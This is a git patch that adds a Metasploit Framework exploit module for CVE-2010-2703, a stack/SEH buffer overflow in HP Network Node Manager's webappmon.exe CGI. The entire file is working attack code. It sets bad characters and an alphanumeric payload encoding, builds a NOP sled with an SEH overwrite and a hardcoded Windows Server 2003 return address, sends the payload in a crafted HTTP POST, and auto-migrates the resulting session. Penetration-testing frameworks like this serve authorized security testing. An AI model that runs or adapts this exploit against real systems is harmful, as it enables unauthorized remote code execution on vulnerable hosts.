From 1a34d81aabb3f3f6fde515ab6e56986e6091b097 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Wed, 23 Mar 2011 03:23:06 +0000 Subject: [PATCH] Added CVE-2010-2703 git-svn-id: file:///home/svn/framework3/trunk@12083 4d416f70-5f16-0410-b530-b9f4589650da --- .../windows/http/hp_nnm_webappmon_execvp.rb | 103 ++++++++++++++++++ 1 file changed, 103 insertions(+) create mode 100644 modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb new file mode 100644 index 0000000000..d73f216bbe --- /dev/null +++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb @@ -0,0 +1,103 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::Seh + + def initialize(info={}) + super(update_info(info, + 'Name' => "HP NNM CGI webappmon.exe execvp Buffer Overflow", + 'Description' => %q{ + This module exploits a buffer overflow in HP NNM's webappmon.exe. + The vulnerability occurs when function "execvp_nc" fails to do any bounds- + checking before strcat is used to append user-supplied input to a buffer. + }, + 'License' => MSF_LICENSE, + 'Version' => "$Revision$", + 'Author' => + [ + 'shahin ', + 'sinn3r', + ], + 'References' => + [ + ['CVE', '2010-2703'], + ['OSVDB', '66514'], + ], + 'Payload' => + { + 'BadChars' => [*(0x00..0x09)].pack("C*") + [*(0x0a..0x0f)].pack("C*") + [*(0x10..0x1f)].pack("C*") + "\x7f", + 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, + 'EncoderOptions' => {'BufferRegister'=>'ECX'}, + }, + 'DefaultOptions' => + { + 'ExitFunction' => "seh", + 'AutoRunScript' => 'migrate -f', + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows Server 2003 Ent', {'Ret'=>0x5A30532D} ], + ], + 'DisclosureDate' => "SEP 6 2010")) + + register_options( + [ + Opt::RPORT(80), + ], self.class) + end + + def exploit + nops = make_nops(1000)*10 + + sploit = nops[0, 5455] + sploit << generate_seh_record(target.ret) + sploit << "\x61"*13 + sploit << "\x51" + sploit << "\xc3" + sploit << nops[0, 57] + sploit << payload.encoded + sploit << nops[0, 10000-sploit.length] + + post_data = "ins=#{sploit}&sel=#{sploit}&app=#{sploit}&act=#{sploit}&arg=#{sploit}&help=#{sploit}&cache=1600 HTTP/1.1" + + connect + + print_status("Sending malicious request...") + send_request_raw({ + 'uri' => '/OvCgi/webappmon.exe', + 'data' => post_data, + 'version' => '1.1', + 'method' => 'POST', + 'headers' => { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language' => 'en-us,en;q=0.5', + 'Accept-Encoding' => 'gzip,deflate', + 'Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', + 'Keep-Alive' => '300', + 'Connection' => 'Keep-Alive', + 'Cache-Control' => 'max-age=0', + 'Content-Length' => post_data.length, + 'Content-Type' => 'application/x-www-form-urlencoded', + } + }, 3) + + handler + disconnect + + end +end \ No newline at end of file